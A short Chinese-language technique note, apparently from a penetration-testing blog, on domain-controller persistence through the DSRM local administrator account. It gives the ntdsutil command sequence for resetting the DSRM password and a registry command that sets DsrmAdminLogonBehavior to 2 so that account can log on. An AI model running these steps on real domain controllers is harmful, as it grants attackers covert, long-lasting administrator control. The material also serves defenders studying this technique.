说明:

DSRM全称Directory Services Restore Mode,中文译为目录服务恢复模式。
域控上有两个administrator账户,一个是域的,一个是本地的,而DSRM是域控服务器的一个本地账户,也就是域控本地的administrator。当域环境出现环境无法使用时,可以用DSRM登录域控服务器进行修复等等。

原理:

用windows自带的ntdsutil的可以修改DSRM账户的密码。且修改域的administrator密码后,不影响本地的administrator(DSRM)密码。当攻击者修改DSRM密码后,则有一个域控服务器的administrator账户,可对域控长期进行控制而难以察觉。

复现:

1、修改本地账户密码
cmd:
ntdsutil //打开进程
set dsrm password //重置管理员密码
reset password on server null //重置DSRM管理员密码
** //重置密码
q //退出
q //退出

2、修改注册表,设置可通过本地账户登录域控
cmd:
reg add HKEY_LOCAL_MACHINE\System\CurrentControlset\Control\Lsa /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
image.png